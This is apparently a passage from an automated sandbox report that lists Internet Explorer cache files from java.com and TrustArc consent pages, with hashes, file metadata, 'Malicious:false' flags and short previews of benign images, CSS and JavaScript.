                                                                                                                                                                                  SSDEEP:12:jXOplOqWlFMVaUsQsV444444wcAKyZmvebayz1Tqn2bz75rajZ0a7VN/GR6abfaf:jwOxMwUOVToYvU9Y2n75rajj7WDg/
                                                                                                                                                                                  MD5:FC9D3DBD283BE4D4F9CA1D836181240A
                                                                                                                                                                                  SHA1:274CDE7C3C12C223D0102407545DCA457945D6BB
                                                                                                                                                                                  SHA-256:52ED6B9B10A887418126A18EFD82166782088AFBE26295C4D10E89CE38FBF586
                                                                                                                                                                                  SHA-512:96285A75D6DAAF409C37F13D1D23753538ED9C891B739CF57D97A68C5A96720C3D3DFBB33173E5B392DC23F7CCFFD84EE9EC934FE0E5BDC8D9B50C7D533E9088
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview: .h.t.t.p.s.:././.w.w.w...j.a.v.a...c.o.m./.f.a.v.i.c.o.n...i.c.o.~............... .h.......(....... ..... .................................}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..}h..........|.........................................................|...p...............u..z\..z\..z\..z\..z\..z\..z\...............p...v...........................................................v...z..................qU..eG..eH..eG..qU......iL...u...........z..................................................jM...w..........................fH..iK..sV..gJ..fH..sV..........fH...v......................................n..m............}c...w.....................................'v.......`.......................................................e.......e...e.......................................................i......o....p.................................................v....q............................................................z...+z............................................................
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\6.cache[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):6773
                                                                                                                                                                                  Entropy (8bit):5.516154253697039
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:vPon1HkyuHEi2ziv3Hg70TnmK/SEAapZ4Ru03jf0cyD/Nu0s5jAQVLuxzbi:XoUEU3EJK/17HENxyDFmWI+i
                                                                                                                                                                                  MD5:744C2D6A085D074CF6AB0BD7A9AAF6FC
                                                                                                                                                                                  SHA1:6FF8D54DC22F2B7B53015D2FBD28372FAA4E07B1
                                                                                                                                                                                  SHA-256:3307962B53E30C3BE5CC8FC3145EE53E703FE69C37E9F289640C99BE2D55272E
                                                                                                                                                                                  SHA-512:B3D2716A44DD773E84A899E0B86F9A53C2F5493362F4D831A5EB27766B4E52DFA53160721BACBF68B8195B386BA5BB337F17C07DD8753C9F51EE386666A498FC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://consent-pref.trustarc.com/defaultpreferencemanager/deferredjs/0D070042D9C67A68E1A4BF804E6E0E06/6.cache.js
                                                                                                                                                                                  Preview: function Kt(){}.function vrb(){}.function frb(a){this.b=a}.function irb(a){this.b=a}.function mrb(a){this.b=a}.function prb(a){this.b=a}.function srb(a){this.b=a}.function yrb(a){this.b=a}.function Atb(a){this.b=a}.function Gv(a){throw new Tu(a)}.function Ddb(a,b){Cdb();a.Ke(a.Ce()+b)}.function XMb(a,b){YMb(a,Cgc,(yv(),Fv(b)))}.function Cdb(){Cdb=Q5b;yt((xt(),xt(),wt))}.function yt(a){!a.b&&(a.b=new Kt);return a.b}.function oi(b,a){b.setDate(a);return b.getTime()}.function ri(a,b,c,d,e,f,g){return new Date(a,b,c,d,e,f,g)}.function Uu(a){bk(this);this.g=!a?null:Sh(a);this.f=a}.function kt(a){it();var b,c;b=yt((xt(),xt(),wt));c=null;a==b&&(c=gw(ht.pg(Llc),77));if(!c){c=new jt(Llc);a==b&&ht.qg(Llc,c)}return c}.function Fv(b){yv();var c;if(b==null){throw new aWb}if(b.length==0){throw new mVb('empty argument')}try{return Ev(b,true)}catch(a){a=YP(a);if(iw(a,11)){c=a;throw new Uu(c)}else throw a}}.function brb(a,b){spb.call(this,a);this.i=new BLb;d8(this,Qrb(new Rrb(this)));this.q=a;this.e=b;
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\6MIRLP64.htm
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:HTML document, ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):5147
                                                                                                                                                                                  Entropy (8bit):5.154022406877804
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:r8qy7YxdYhAVYYn3MCysvq15MwxXkqnSqcO/2C1gigij:r8/0xChAaJvGqtx0qnSq9/bj
                                                                                                                                                                                  MD5:14C0A5A0AF9411825A689ADE15E42B51
                                                                                                                                                                                  SHA1:F94CC78F1D464582CEF3217C183C7C3B012E54A3
                                                                                                                                                                                  SHA-256:5D59D71FA30604E26C815B2BCFEA777BEF1564467E2FF9B1B4DC45CA2EE0F6FE
                                                                                                                                                                                  SHA-512:E046C5DF4CEA8E473ACAB8BE624BB30946D03F4CEEC81A03E1826EAD692FE704682E4097E9E6D39CCCC4BD469205E241A6FFEE7DF84082945D8C1A5CE6F7C839
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://consent-pref.trustarc.com/?type=oracle6&site=oracle.com&action=notice&country=ch&locale=en&behavior=expressed&gtm=1&layout=default_eu&irm=undefined&from=https://consent.trustarc.com/
                                                                                                                                                                                  Preview: <!doctype html>.<html>.<head>.<meta http-equiv="content-type" content="text/html; charset=UTF-8">.<meta name="viewport" content="width=device-width, initial-scale=1.0" />.<link href="images/favicon.ico" rel="shortcut icon" type="image/x-icon">.<title>TrustArc Preference Manager</title>..<meta name="keywords"..content="online trust, online privacy, email privacy, email safety, consumer privacy, brand trust, online seals, prevent spyware, privacy alert" />.<meta name="description"..content="TrustArc Cookie Consent Manager helps ensure online privacy compliance." />..<script type="text/javascript">..var baseCDNUrl = "//consent-st.trustarc.com/get?name=";..var QueryString = function() {...// This function is anonymous, is executed immediately and ...// the return value is assigned to QueryString!...var query_string = {};...var query = window.location.search.substring(1);...var vars = query.split("&");...for ( var i = 0; i < vars.length; i++) {....var pair = vars[i].split("=");....// If fi
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\EuPreferenceManager[1].css
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):27745
                                                                                                                                                                                  Entropy (8bit):5.042943398466011
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:xDMuxcCdWdamlRHq038IiBVT6lXcyfBWfTbQe97jl7yE:R1xcC3mlwIirT6lMEBKEeFIE
                                                                                                                                                                                  MD5:182FC39AFF61D22162DFD04D282791E2
                                                                                                                                                                                  SHA1:737ED8C224ED9313F5325AEC984CDE6043974C51
                                                                                                                                                                                  SHA-256:1EA22EF5CC12712E650AC15269E8E7B75904F47246CE6EB04BF0FCD42F8BED77
                                                                                                                                                                                  SHA-512:C20168EDB22C2B2AA9454150EB7DEBB55373C7999E294482AB540DD550BF4FE443D05EA45A62D2816F59D5C4C4F11EDD4E17C23916B61787670688901828F6F9
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://consent-pref.trustarc.com/EuPreferenceManager.css
                                                                                                                                                                                  Preview: html, body, div, span, applet, object, iframe,.h1, h2, h3, h4, h5, h6, p, blockquote, pre,.a, abbr, acronym, address, big, cite, code,.del, dfn, em, font, img, ins, kbd, q, s, samp,.small, strike, strong, sub, sup, tt, var,.b, u, i, center,.dl, dt, dd, ol, ul, li,.fieldset, form, label, legend,.table, caption, tbody, tfoot, thead, tr, th, td {. background: transparent;. border: 0;. margin: 0;. padding: 0;. vertical-align: baseline;.}..body { font-size: 12px; font-family: "Helvetica Neue",Helvetica,Arial,sans-serif; line-height: 20px; }.body.main { background: url(images/bg.png) no-repeat center 0; line-height: 20px; }.body.pbg { background: #fff url(images/pbg.jpg) repeat-y 1px 0; }.input, textarea, select { font-size: 12px; font-family: 'Lucida Grande', Arial, Helvetica, sans-serif; }..../***INDEX.HTML***/..mainheader {}..mainHeader h1 { color: #2C2D31; font-size: 18px; display: inline-block; }..accept-decline-buttons { float: right; }.#accept_all_button{ background: no
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\T79A9-GDDN2-93ZD5-M6HUR-X83QX[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:C source, ASCII text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):209939
                                                                                                                                                                                  Entropy (8bit):5.366006952026174
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3072:1P6RsHIwj0PdUgdbs8kvdYkODdlm9AZoZXs+eSc:1msHIxHMvd8dtZoZDc
                                                                                                                                                                                  MD5:FA4C76A7FDE62B18054CF7EB8E946012
                                                                                                                                                                                  SHA1:B20150066A879D2B78DD3D4908F4ACD148EE66F8
                                                                                                                                                                                  SHA-256:09EBD7F407439990AAC227E70DA23E1A819E8E30282928E324370805F480BEC4
                                                                                                                                                                                  SHA-512:D72F5D078675C7ADBF6BFC1980712542A10668AEC9163137A2EC70A5E117F8FFDD0F06A6C4C6636E35C04F2754F33D40C65C59D452AFAA8EA4A382F24F200ABD
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://s.go-mpulse.net/boomerang/T79A9-GDDN2-93ZD5-M6HUR-X83QX
                                                                                                                                                                                  Preview: /*. * Copyright (c) 2011, Yahoo! Inc. All rights reserved.. * Copyright (c) 2011-2012, Log-Normal, Inc. All rights reserved.. * Copyright (c) 2012-2017, SOASTA, Inc. All rights reserved.. * Copyright (c) 2017, Akamai Technologies, Inc. All rights reserved.. * Copyrights licensed under the BSD License. See the accompanying LICENSE.txt file for terms.. */./* Boomerang Version: 1.720.0 b17966bb92f8ac2ddcda4ac1d9c0aaea6d2eda7b */..BOOMR_start=(new Date).getTime();function BOOMR_check_doc_domain(e){if(window){if(!e){if(window.parent===window||!document.getElementById("boomr-if-as"))return;if(window.BOOMR&&BOOMR.boomerang_frame&&BOOMR.window)try{BOOMR.boomerang_frame.document.domain!==BOOMR.window.document.domain&&(BOOMR.boomerang_frame.document.domain=BOOMR.window.document.domain)}catch(t){BOOMR.isCrossOriginError(t)||BOOMR.addError(t,"BOOMR_check_doc_domain.domainFix")}e=document.domain}if(e&&-1!==e.indexOf(".")&&window.parent){try{window.parent.document;return}catch(t){try{document.doma
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\a[1].gif
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):43
                                                                                                                                                                                  Entropy (8bit):3.0314906788435274
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:CUkwltxlHh/:P/
                                                                                                                                                                                  MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                                                  SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                                                  SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                                                  SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/header/a.gif
                                                                                                                                                                                  Preview: GIF89a.............!.......,...........D..;
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\caas_contenttypemap[1].json
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):3125
                                                                                                                                                                                  Entropy (8bit):4.708672411255487
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:DRW1pojcBXmQpFvjcUvpNzjcUvph1T1poApFv5pNz5phn+1poApFvNl0pNzNl0p5:DIfRbn+bFlUllbHbUb8D9p/beTbDbh
                                                                                                                                                                                  MD5:7D8560AEF25A94AF3F959DB0AD8440EA
                                                                                                                                                                                  SHA1:2871121A548A749D990996C6BFA30277464E82D9
                                                                                                                                                                                  SHA-256:DA80CD5E7CA38A0D24D78256CF7D248BF8D5255140E1EF75C554EAC923E13CD5
                                                                                                                                                                                  SHA-512:819E6640E8EB513764E929458EB8F8F39EAF96466905FBB4458FC9A7586C1A16E6E61274C0F4BCCD3FEEF1D0B226023219221D9DF2EFC5EF715D3529275BB314
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_97bc/caas_contenttypemap.json
                                                                                                                                                                                  Preview: [{"type":"JCOM_HelpArticle","categoryList":[{"categoryName":"Content List Default","layoutName":"JCOM-HelpArticle_Link"},{"categoryName":"Content Placeholder Default","layoutName":"JCOM-HelpArticle_Detail"},{"categoryName":"Default","layoutName":"JCOM-HelpArticle_Detail"},{"categoryName":"Empty Content List Default","layoutName":""}]},{"type":"JCOM_Footer","categoryList":[{"categoryName":"Content List Default","layoutName":""},{"categoryName":"Content Placeholder Default","layoutName":"JCOM-Footer_Detail"},{"categoryName":"Default","layoutName":"JCOM-Footer_Detail"},{"categoryName":"Empty Content List Default","layoutName":""}]},{"type":"JCOM_UninstallApplet","categoryList":[{"categoryName":"Content List Default","layoutName":""},{"categoryName":"Content Placeholder Default","layoutName":"JCOM-UninstallApplet_Detail"},{"categoryName":"Default","layoutName":"JCOM-UninstallApplet_Detail"},{"categoryName":"Empty Content List Default","layoutName":""}]},{"type":"JCOM_PropertyHTML","categor
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\get[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):20646
                                                                                                                                                                                  Entropy (8bit):5.219540701770321
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:gjxmfkjIB21UlcgyrtayD4yody5yXyRU96y2IPyyka6yAoyyy6nywym4yy2yybyS:q4Bs8cJjBgCRY9ueIVr/xxLlLcNn5WW9
                                                                                                                                                                                  MD5:B2C1B4A41E148456B58383C349CA4B29
                                                                                                                                                                                  SHA1:8B8ADB9FBBB407C62A8289DAAB1259949E72BE55
                                                                                                                                                                                  SHA-256:F1BA71D3BF034AECEECB8895E71A44F4806DBB5BCC44E46FD8FC461A774EB880
                                                                                                                                                                                  SHA-512:14246D376ABF21E6EF7BA2670AF08968E24639F60789301D352FDE5CCCE25D27ADF98A7C7BFA751FB1CB3A413899E62B4AE0DC885DABE11BED4EEEFAE3BAB1CC
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://consent-st.trustarc.com/get?name=combined_static_cm_minified.js
                                                                                                                                                                                  Preview: function installPlugin(){function xpinstallCallback(url,status){if(status==0)msg="XPInstall Test: PASSED\n";else msg="XPInstall Test: FAILED\n";dump(msg);alert(msg)}xpi={"ADCookie Plugin install!":"/adcookieoptout/adcookie.xpi"};InstallTrigger.install(xpi,xpinstallCallback)}function TRUSTe_checkplugin(){if(!BrowserDetect.browser)BrowserDetect.init();if(BrowserDetect.browser=="Explorer")TRUSTe_checkPluginForIE();else TRUSTe_checkPluginForNonIE()}.function TRUSTe_checkPluginForNonIE(){if(BrowserDetect.browser=="Chrome"){var elem=document.createElement("div");elem.setAttribute("action","CheckAddonAPIVersion");document.body.appendChild(elem);elem.addEventListener("CookieEventAPIResponse",function(event){if(event.target.getAttribute("action")!="CheckAddonAPIVersion")return;TRUSTe_addVersionToDOM(event);elem.parentNode.removeChild(elem);event.stopPropagation()},false,true);var evt=document.createEvent("Event");evt.initEvent("CookieEventAPI",true,.true);elem.dispatchEvent(evt)}}function T
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\header[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):117
                                                                                                                                                                                  Entropy (8bit):4.339316892918074
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:FnXKP6jJGAJqjwba3fEVRVJTt8VJfB8JHBV:FnXKPmJpa30RN8VJZqv
                                                                                                                                                                                  MD5:7C75E3C13ECB36C435F0DBB588121F1E
                                                                                                                                                                                  SHA1:786BDF8C01C423B57F3E32FE4EDFA6BAB8E609A5
                                                                                                                                                                                  SHA-256:47FC7E24694B95D777E8DD251A1DC715C0E92EA0DE35873C5790F776FE34C7BA
                                                                                                                                                                                  SHA-512:2FD948BC233EBEACD28380CDCEBE5BB8AA039931BFEC2F9ACD89AFAE83B9DD76CD69E6FD46B0E52CCD29458900EF26120854168BDB285D4D4093148CCE012B89
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/translations/header.js
                                                                                                                                                                                  Preview: define({root:!0,de:!0,es:!0,fr:!0,it:!0,ja:!0,ko:!0,nl:!0,pl:!0,"pt-BR":!0,ru:!0,sv:!0,tr:!0,"zh-CN":!0,"zh-TW":!0});
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\i18n.min[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):1190
                                                                                                                                                                                  Entropy (8bit):5.22354092284205
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:cnNQ3iRE19tuafAXP5ucA3R0sFZSMz0fec5AQxofPp16sPvV2oonQSj1pf:qUXtFGP5ucAysFZIfLAffBUopSz
                                                                                                                                                                                  MD5:CDC1B9E99E06127C245C3E082B62C8DB
                                                                                                                                                                                  SHA1:3584F7B136059DF16096E84A14B7093FBB1C464F
                                                                                                                                                                                  SHA-256:E2CDEC61D821EA2D31A5232EE702D6BC3AB73CFAEF75211399CFFB48F8139D37
                                                                                                                                                                                  SHA-512:4FE8C7FD00698DFA54FA99E509DBFBAF8D722FE06C71673288FD4E96FF85B87A604B8995ABB0E6D7ED3142237C1AB7DA8E23CE222C6DD36D66EF7A8A0A3184D2
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/js/dependencies/i18n.min.js
                                                                                                                                                                                  Preview: !function(){"use strict";function d(o,n,e,a,t,r){n[o]&&(e.push(o),!0!==n[o]&&1!==n[o]||a.push(t+o+"/"+r))}function y(o,n,e,a,t){var r=a+n+"/"+t;require._fileExists(o.toUrl(r+".js"))&&e.push(r)}function w(o,n,e){var a;for(a in n)!n.hasOwnProperty(a)||o.hasOwnProperty(a)&&!e?"object"==typeof n[a]&&(!o[a]&&n[a]&&(o[a]={}),w(o[a],n[a],e)):o[a]=n[a]}var j=/(^.*(^|\/)nls(\/|$))([^\/]*)\/?([^\/]*)/;define(["module"],function(o){var h=o.config?o.config():{};return{version:"2.0.6",load:function(o,r,i,n){(n=n||{}).locale&&(h.locale=n.locale);var e,l,a,t=j.exec(o),u=t[1],f=t[4],s=t[5],c=f.split("-"),g=[],v={},p="";if(t[5]?e=(u=t[1])+s:(e=o,s=t[4],f=(f=h.locale)||(h.locale="undefined"==typeof navigator?"root":(navigator.languages&&navigator.languages[0]||navigator.language||navigator.userLanguage||"root").toLowerCase()),c=f.split("-")),n.isBuild){for(g.push(e),y(r,"root",g,u,s),l=0;l<c.length;l++)a=c[l],y(r,p+=(p?"-":"")+a,g,u,s);r(g,function(){i()})}else r([e],function(a){var o,t=[];for(d("root",
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\jv0_oracle[1].gif
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:GIF image data, version 89a, 91 x 22
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):919
                                                                                                                                                                                  Entropy (8bit):6.420171258574878
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:DUifmRlw/Uvzy6yDGr+492MDfywVZ2Nje:3fk8Gr+IekZ2Nje
                                                                                                                                                                                  MD5:9AD2F2B528AB933E785FD31BA5C642D6
                                                                                                                                                                                  SHA1:8F6519118DC9F35642C046A989302AF11EDD708D
                                                                                                                                                                                  SHA-256:9DD4760AD78DA6F14A0EDC582C03982A9392AC676244FC762A7B0BA059C24812
                                                                                                                                                                                  SHA-512:DB643B0921949F79B95DB9F63659E6FA988BFEFEC4F4536AFF3FF8E00C6FD5D2FAAA586F1E3039734372BCFA74BE1D50BEF7529B47C1E9D0C62FC2296F0DF07E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/footer/jv0_oracle.gif
                                                                                                                                                                                  Preview: GIF89a[.............33.......<<.....................................cc..........??....KK.99.{{....~~....--.......00....**....ii.WW....NN.............ZZ.HH....TT...................``.rr.......ff....EE.......$$.ll.oo.66.xx..........QQ.......BB.]]....''.!!................................................................................................................................................!.......,....[..........................<;......9.........@'...-........(...I.5..-...../.....#...............1...=.1.2.A.J$.........1...@...#..!...t2t-..#...`.....3......"!....W..BB...@......!*..I...B.X. ......x9...P.4.(hI...X"J.@..P.6I.#..F..,..".......tl. ....r. ERl...t.F!QH!..tP.......@.D!@.R..$..@..CJ.1.....E6.$@..H....A..B.g. ....)a...........f#a0Lc...8l..)H...,.........L<.f.....!.....!s.)`.....7.........D|.{.....dt.[7.*.O..@.A.@.F..0..3p..",.6......0.<..s. ..8X.T0.\7.(...,...0.(.4.h.8..<......;
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\jv0h[1].jpg
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:[TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS4 Macintosh, datetime=2011:01:25 18:25:40], baseline, precision 8, 777x95, frames 3
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):33382
                                                                                                                                                                                  Entropy (8bit):7.450231632805739
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:768:aFZ3oEM+kcnJbKMY24ibgwJOEtW73o79d3SP:eZ3oiJd6wJOj7QbY
                                                                                                                                                                                  MD5:3AAFB427F71A50D3D6BDFFA76ABA4380
                                                                                                                                                                                  SHA1:E8D483CFB9DAB0446C89666FF12A8B8E1F97CA6D
                                                                                                                                                                                  SHA-256:F8E752CEAE01AF6482D110260838F393C84B8D822E53D9E24BE8D3EFCB57651E
                                                                                                                                                                                  SHA-512:13DFBE537B2AC5654C2DF5F673BDB4E1CC9E54FBE457C4A05921433C1D50E45FC559C6419DB21F56071FAB9AF41ADB6B9F6B3E272B029919D1A0EFA74DF49A5B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/img/header/jv0h.jpg
                                                                                                                                                                                  Preview: ......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i....................'.......'.Adobe Photoshop CS4 Macintosh.2011:01:25 18:25:40......................................_...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..V....ljo.l7.k..............;.......[&..z..u{.{...m....c}...8.5.2....<msK..P..2.;k.c.7......}U. H......2........{..A7.
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\layout[1].htm
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):69
                                                                                                                                                                                  Entropy (8bit):4.2053905817469905
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:uGK4bqf6FGs/:vf
                                                                                                                                                                                  MD5:31E65444B9EF22C90B0CB11A27F64863
                                                                                                                                                                                  SHA1:D2AFF3063580CD697754584D923972FBDCFABE7A
                                                                                                                                                                                  SHA-256:EE8A71FAFB65F44BF73C699B1C21F8C49B9FB176700FC2807D36413E5BF8A13B
                                                                                                                                                                                  SHA-512:8FC0836155CD0B01BB7002C512DFD3661605676BC3F06C5837295715EC6343821CB30CF4955B0EAD8944BB140B461DC61623685229726BD2C42AA6B14308BDC3
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_compdelivery/_cache_2094/JCOM-Footer_Detail/assets/layout.html
                                                                                                                                                                                  Preview: <div class="jvf0">. {{#fields}}. {{{body}}}. {{/fields}}.</div>.
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\print[1].css
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):804
                                                                                                                                                                                  Entropy (8bit):5.112445136333023
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12:+qAyjfRR4ZN3A7JCHWX3d+yFrYaOzekBBsuDJ/cOYuOYgIWxnoDmZ2aLAob:FreBYJCm3RZI+YbEZ0aJ
                                                                                                                                                                                  MD5:4F4FA7F6D2D8B440E06729E428EF16B1
                                                                                                                                                                                  SHA1:B20A0C9A0FF94FA896ABEEEF26033291EAB959A9
                                                                                                                                                                                  SHA-256:852B5C251CE5A304159750A6493E562C2E30AEC62C47C9549AD9B7D3D4D2CAE6
                                                                                                                                                                                  SHA-512:A645D8DB979033C4E84E7066B5F8BB9791FC90942B8E3D4347928B85E7FFFA4DAD376CC7F2AC2F8CDBD7F6D32F60BF4502A35DCCAEF8ED8F364F70EE3F771E38
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://www.java.com/_cache_4ba9/_themesdelivery/JCOM_Base_Theme/assets/css/print.css
                                                                                                                                                                                  Preview: body{line-height:1.5;font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;color:#000;background:0;font-size:10pt}.container{background:0}hr{background:#ccc;color:#ccc;width:100%;height:2px;margin:2em 0;padding:0;border:0}hr.space{background:#fff;color:#fff}h1,h2,h3,h4,h5,h6{font-family:"Helvetica Neue",Arial,"Lucida Grande",sans-serif}code{font:.9em "Courier New",Monaco,Courier,monospace}img{float:left;margin:1.5em 1.5em 1.5em 0}a img{border:0}p img.top{margin-top:0}blockquote{margin:1.5em;padding:1em;font-style:italic;font-size:.9em}.small{font-size:.9em}.large{font-size:1.1em}.quiet{color:#999}.hide{display:none}a:link,a:visited{background:transparent;font-weight:700;text-decoration:underline}a:link:after,a:visited:after{content:" (" attr(href) ") ";font-size:90%}.jvf0,.jvh0{display:none}
                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\require[1].js
                                                                                                                                                                                  Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):17793
                                                                                                                                                                                  Entropy (8bit):5.215395984599636
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:6vCwvGiN5cMU8QatLePlko998VpSAIgujHrEDO11yy1qlMW2IP4VldNJ:0G7MU8qPlko998PhIg0HrEDM1yy1qlR2
                                                                                                                                                                                  MD5:E9342BC1D3266232090154892C0637D3
                                                                                                                                                                                  SHA1:AF6E361DC1E0EABD7AA52E8C0BBA133C60E5E388
                                                                                                                                                                                  SHA-256:8D4B8FCEDCB0B6181A85C79254CDF85F7B97ABFCBA9DD51C93C308C9835FDEA9
                                                                                                                                                                                  SHA-512:7B8D96A8A2F82125FBDD162A37E7B4ADAE474931F9BCDDEFAA1911D35147BBAA32CF3350C92363D1194505F7A6DDF72A961A907A6926F7EBAC7F37F9D5304D18
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  IE Cache URL:https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/require.js
